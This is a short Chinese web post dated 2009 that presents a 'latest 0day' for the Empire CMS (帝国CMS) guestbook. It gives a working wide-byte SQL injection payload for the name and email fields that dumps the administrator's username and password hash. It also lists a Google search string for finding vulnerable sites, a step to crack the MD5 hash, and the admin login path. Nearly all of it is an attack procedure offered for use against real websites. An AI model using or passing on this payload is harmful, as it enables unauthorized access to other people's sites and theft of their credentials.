帝国CMS的最新0day

2009/7/13 来源:www.arpun.com 作者:小白

找到使用帝国CMS的站,网址后面直接加:e/tool/gbook/?bid=1

出来的是帝国CMS的留言本,在姓名处写:縗\

联系邮箱处写:,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from

phome_enewsuser where userid=1),1,1,1,0,0,0)/*

提交后爆出账号密码

测试方法:利用google搜索关键字 inurl:e/tool/gbook/?bid=1, 然后依照上面方式留言, 显示结果即爆出管理员帐号和密码md5值, 破解密码登陆后台。

后台/e/admin/

网友评论
评论(...
全部评论